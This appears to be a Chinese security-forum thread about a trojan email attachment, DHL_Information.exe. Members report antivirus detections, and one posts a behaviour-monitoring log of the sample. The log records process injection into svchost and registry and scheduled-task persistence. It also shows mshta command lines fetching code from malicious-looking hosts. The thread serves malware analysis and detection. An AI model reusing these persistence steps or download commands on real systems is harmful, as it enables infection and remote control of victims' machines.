邮件附件，病毒，让同学电脑进入系统后是黑屏

zdlzp

程序：
C:\DOCUMENTS AND SETTINGS\LOCAL SETTINGS\TEMP\RAR$EX00.852\DHL_INFORMATION.EXE
木马程序生成以下文件：
1) C:\DOCUMENTS AND SETTINGS\LOCAL SETTINGS\TEMP\F.TMP
是否删除木马程序及其衍生物?


程序：
C:\DOCUMENTS AND SETTINGS\LOCAL SETTINGS\TEMP\RAR$EX00.852\DHL_INFORMATION.EXE
木马程序生成以下文件：
1) C:\DOCUMENTS AND SETTINGS\LOCAL SETTINGS\TEMP\10.TMP
2) C:\DOCUMENTS AND SETTINGS\APPLICATION DATA\HOTFIX.EXE
是否删除木马程序及其衍生物?

rasis

AVIRA

Detected a virus or malware 'TR/Oficla.7168010.2' [trojan]
in file 'G:\TEMP\bkyCwqxK.htm.part'.
Action taken: Delete file

hansyu

panda
Trj/Sinowal.WXO

liulangzhecgr

第一次监控：

2010-11-17 11:48:17    运行应用程序      操作:允许
进程路径:C:\WINDOWS\explorer.exe
文件路径:E:\virus test\DHL_Information\DHL_Information.exe
触发规则:所有程序规则->0-virus test->*


2010-11-17 11:48:21    创建文件      操作:允许
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\1A.tmp
触发规则:所有程序规则->A01…FD全局询问否定组->?:\*


2010-11-17 11:48:24    运行应用程序      操作:阻止
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
文件路径:C:\WINDOWS\system32\svchost.exe
触发规则:所有程序规则->A01…禁止注入系统进程（黑名单）->%windir%\system32\svchost.exe


2010-11-17 11:48:29    创建文件      操作:允许
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
文件路径:C:\WINDOWS\system32\ttux.qqo
触发规则:所有程序规则->A01…FD全局询问否定组->?:\*


2010-11-17 11:48:30    修改注册表内容      操作:阻止
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
注册表名称:Shell
更改后:Explorer.exe rundll32.exe ttux.qqo uudigo
更改前:Explorer.exe
触发规则:所有程序规则->A02…注册表启动项保护（黑名单）->*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon


......


第二次监控：

2010-11-17 11:50:50    运行应用程序      操作:使用任务隔离区操作
进程路径:C:\WINDOWS\explorer.exe
文件路径:E:\virus test\DHL_Information\DHL_Information.exe


2010-11-17 11:50:51    运行应用程序      操作:使用任务隔离区操作
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
文件路径:C:\WINDOWS\system32\svchost.exe


2010-11-17 11:50:51    创建远程线程      操作:使用任务隔离区操作
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
目标进程:C:\WINDOWS\system32\svchost.exe


2010-11-17 11:51:08    运行应用程序      操作:使用任务隔离区操作
进程路径:C:\WINDOWS\explorer.exe
文件路径:E:\virus test\DHL_Information\DHL_Information.exe


2010-11-17 11:51:08    运行应用程序      操作:使用任务隔离区操作
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
文件路径:C:\WINDOWS\system32\svchost.exe


2010-11-17 11:51:08    创建远程线程      操作:使用任务隔离区操作
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
目标进程:C:\WINDOWS\system32\svchost.exe


忍无可忍。。。学习模式运行！

2010-11-17 12:20:13    运行应用程序      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\explorer.exe
文件路径:E:\virus test\DHL_Information\DHL_Information.exe


2010-11-17 12:20:14    创建文件      操作:允许(自动创建规则)
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\1F.tmp


2010-11-17 12:20:16    运行应用程序      操作:允许(自动创建规则)
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
文件路径:C:\WINDOWS\system32\svchost.exe


2010-11-17 12:20:16    创建远程线程      操作:允许(自动创建规则)
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
目标进程:C:\WINDOWS\system32\svchost.exe


2010-11-17 12:20:17    修改文件      操作:允许(自动创建规则)
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
文件路径:C:\WINDOWS\system32\ttux.qqo


2010-11-17 12:20:17    修改注册表内容      操作:允许(自动创建规则)
进程路径:E:\virus test\DHL_Information\DHL_Information.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
注册表名称:Shell
更改后:Explorer.exe rundll32.exe ttux.qqo uudigo
更改前:Explorer.exe


2010-11-17 12:20:28    删除文件      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\svchost.exe
文件路径:E:\virus test\DHL_Information\DHL_Information.exe


2010-11-17 12:20:28    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\svchost.exe
注册表路径:HKEY_CLASSES_ROOT\idid
注册表名称:[Key]


2010-11-17 12:21:18    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\svchost.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\20.tmp
触发规则:所有程序规则->0-virus test->*


2010-11-17 12:21:20    创建文件      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\20.tmp
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\~21.tmp


2010-11-17 12:21:20    创建文件      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\20.tmp
文件路径:C:\WINDOWS\ws386.ini


2010-11-17 12:21:24    创建文件      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\20.tmp
文件路径:C:\WINDOWS\system32\aspimgr.exe


2010-11-17 12:21:24    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr
注册表名称:[Key]


2010-11-17 12:21:24    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr
注册表名称:Type


2010-11-17 12:21:25    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr
注册表名称:Start


2010-11-17 12:21:25    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr
注册表名称:ErrorControl


2010-11-17 12:21:26    安装服务或者驱动      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
文件路径:C:\WINDOWS\system32\aspimgr.exe


2010-11-17 12:21:26    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr
注册表名称:ImagePath


2010-11-17 12:21:26    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr
注册表名称:DisplayName


2010-11-17 12:21:26    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr\Security
注册表名称:[Key]


2010-11-17 12:21:27    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr\Security
注册表名称:Security


2010-11-17 12:21:27    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr
注册表名称:ObjectName


2010-11-17 12:21:28    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR
注册表名称:[Key]


2010-11-17 12:21:28    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR
注册表名称:NextInstance


2010-11-17 12:21:28    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR\0000
注册表名称:[Key]


2010-11-17 12:21:29    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR\0000
注册表名称:Service


2010-11-17 12:21:29    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR\0000
注册表名称:Legacy


2010-11-17 12:21:30    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR\0000
注册表名称:ConfigFlags


2010-11-17 12:21:30    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR\0000
注册表名称:Class


2010-11-17 12:21:30    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR\0000
注册表名称:ClassGUID


2010-11-17 12:21:31    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASPIMGR\0000
注册表名称:DeviceDesc


2010-11-17 12:21:31    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr\Enum
注册表名称:[Key]


2010-11-17 12:21:31    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr\Enum
注册表名称:0


2010-11-17 12:21:32    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr\Enum
注册表名称:Count


2010-11-17 12:21:32    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\aspimgr\Enum
注册表名称:NextInstance


2010-11-17 12:21:32    运行应用程序      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\services.exe
文件路径:C:\WINDOWS\system32\aspimgr.exe


2010-11-17 12:21:33    创建文件      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\20.tmp
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\_check32.bat


2010-11-17 12:21:39    创建文件      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\aspimgr.exe
文件路径:C:\WINDOWS\s32.txt



2010-11-17 12:21:40    创建文件      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\aspimgr.exe
文件路径:C:\WINDOWS\g32.txt


2010-11-17 12:21:41    运行应用程序      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\20.tmp
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c ""C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\_check32.bat" "


2010-11-17 12:22:01    运行应用程序      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\svchost.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp


2010-11-17 12:22:18    运行应用程序      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp
文件路径:C:\WINDOWS\system32\mshta.exe
命令行:http://reporteriche.com/inst.php?id=abs_08


2010-11-17 12:22:20    创建文件      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp
文件路径:C:\Documents and Settings\Administrator\Application Data\hotfix.exe


2010-11-17 12:22:20    创建文件      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp
文件路径:C:\Documents and Settings\Administrator\Application Data\scgdfgasfbh.bat


2010-11-17 12:22:24    运行应用程序      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c ""C:\Documents and Settings\Administrator\Application Data\scgdfgasfbh.bat" "


2010-11-17 12:22:27    运行应用程序      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp
文件路径:C:\WINDOWS\system32\at.exe
命令行:00:23 /every:M,T,W,Th,F,S,Su mshta.exe http://funnyhamstersshow.com/sgapgh.php?sdffdh=235341113734614


2010-11-17 12:22:48    修改注册表内容      操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\mshta.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
注册表名称:SavedLegacySettings



2010-11-17 12:23:31    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
注册表名称:Shell


2010-11-17 12:23:32    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
注册表名称:WarnOnPostRedirect


2010-11-17 12:23:32    修改注册表内容      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
注册表名称:WarnOnPost


2010-11-17 12:23:33    创建注册表值      操作:允许(自动创建规则)
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\22.tmp
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
注册表名称:WarnonBadCertRecving

hilan

趋势终于报了

li370286038

金山卫视报未知

li370286038

卡巴检测到一个！

pipi1987

AVG拦截
发现病毒fakealert

win98sp123

  在我的机器上，双击，微点没反应，查看程序生成日志里，没衍生物，查看注册表改动，也没改动，就是双击后程序立即退出了。。。